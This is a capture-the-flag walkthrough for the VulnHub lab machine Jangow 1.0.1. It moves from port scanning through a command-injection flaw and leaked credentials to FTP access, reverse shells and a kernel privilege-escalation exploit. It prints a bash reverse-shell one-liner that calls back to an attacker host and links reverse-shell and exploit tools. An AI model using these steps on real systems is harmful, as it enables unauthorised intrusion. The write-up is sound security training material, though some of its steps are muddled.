Jangow:1.0.1 Walkthrough
Getting root access to the target machine is the aim of the capture the flag (CTF) attack. It is said that the key to cracking this CTF is enumeration. The ability to use some basic pen-testing tools and familiarity with Linux commands would be necessary.
Download Link : https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova
Enumeration
We are going to identify the IP address with the help of netdiscover.
sudo netdiscover -i eth0
We have identified the target IP address, 192.168.56.118, from the output. Let’s now do a network scan to find out which ports have been opened, as this is necessary for the enumeration procedure.
This offers us the opportunity to better understand the attacking surface and design targeted attacks.
nmap -sC -sV 192.168.56.118
We learned that ports 21 and 80 are open based on the output.
It will be simple to get in to the server if you have appropriate credentials because port 21 tcp is functioning on the ftp service.
Running port 80 TCP on the HTTP service suggests that a potentially vulnerable website is being hosted.
We are redirected to the broken link page by the URL. We have discovered that the machine has directory listing enabled. One folder with the name site/ was located in the current directory.
Foothold
We found this Grayscale website by clicking on the link that was previously displayed. There wasn’t much to see, except for the buscar page, which was located in the upper right corner.
It appears to be executing a POST request, which is interesting. It appears that there is a Local File Inculsion (LFI) vulnerability on this website. What does the term “buscar” mean? It appears like a Spanish word, and when you translate it, this is what you get.
Let’s see what we can do with this LFI vulnerability. Let’s type ls -al command to list out the files and directories.
We were able to identify a WordPress directory from the output. We discovered that this page is broken after visiting the WordPress page.
This could be occurring as a result of WordPress losing access to the database or the database being erased. Returning to the buscar tab, let’s see if any other files exist that might help in establishing an FTP connection.
Although the result indicates the existence of a config.php file, it appears to be something else. Let’s use the cat command to open the file and read the contents.
We can see the username and password in the output. With their assistance, let’s attempt an FTP connection.
It is evident that the attempt to log in was unsuccessful, indicating that WordPress is experiencing difficulties accessing the database. Now let’s see the current working path .
Now let’s enumerate every hidden file and directory that could exist in /var/www/html.
The report indicates the presence of a .backup file, which appears to contain backup database credentials. Let’s use cat command to read the file.
Let’s try connecting to the server with the FTP client tool once more. We were able to successfully log in.
The user file is located under the jangow01 directory. To see a list of files and directories, use ls. Let’s use get from ftp to download the file.
get user.txt
Let’s read user.txt’s content now.
We now need to figure out how to elevate user jangow01’s privileges to that of super admin. Reverse shell is one method to see if it is achievable or not.
Let’s look at each potential approach individually.
Method 1: Using php-reverse-shell.php
If we push and execute a PHP reverse shell file on the server, we can establish a reverse shell connection. This LFI vulnerability that we have already discovered can be chained. The malicious PHP code must be uploaded to the target system in order for it to return a reverse shell to us.
The web server will then run the PHP code when we request this file via the LFI. We have two options: write our own PHP code or use one of the many PHP reverse shells that are out there.
- Reverse shell link: https://github.com/pentestmonkey/php-reverse-shell
We will try to upload the file after we adjust the listening host IP and listening port variables to fit our configuration. However, because the janow01 user lacks permission to change the web directories, the upload is not feasible.
Method 2: Using Netcat
The netcat command also makes it possible to establish a reverse connection.
nc 192.168.56.118 21
To log in, enter your password and username. However, with this, the reverse shell connection is likewise unavailable.
Method 3: Using Bash Shell script
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1Change the port and IP address for this code. Turn on the netcat listener on the port you specified before executing this command.
Although the receiving shell is not entirely interactive, we have gained a foothold. But we can use Python 3 to improve it. Finally, we were able to access the fully interactive shell by setting the environment variable.
Switch the user to jangow01 using the sudo su command and paste the password.
Privilege Escalation
To obtain the maximum privilege in the system, the next step is to escalate to the root user. Navigate back to the jangow01 directory and make a list of all the hidden folders and files.
We will use a program called Linpeas for privilege escalation, which can automate a significant portion of the target system’s enumeration procedure..
- Download link: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
It is now necessary to use the FTP service to move it to the destination system.
We can verify it on target machine.
Give it permission to be executed, then carry it out.
We have learned vital information from the output: our target is vulnerable to this exploit. Aim to take advantage of eBPF_verifier.
The script is available in the ExploitDB database.
Utilizing the gcc command line utility, compile the program. Make a new file once it has been executed. We are able to observe that kernel expolit gives us root upon successful execution. You can now locate the root flag to complete the challenge.
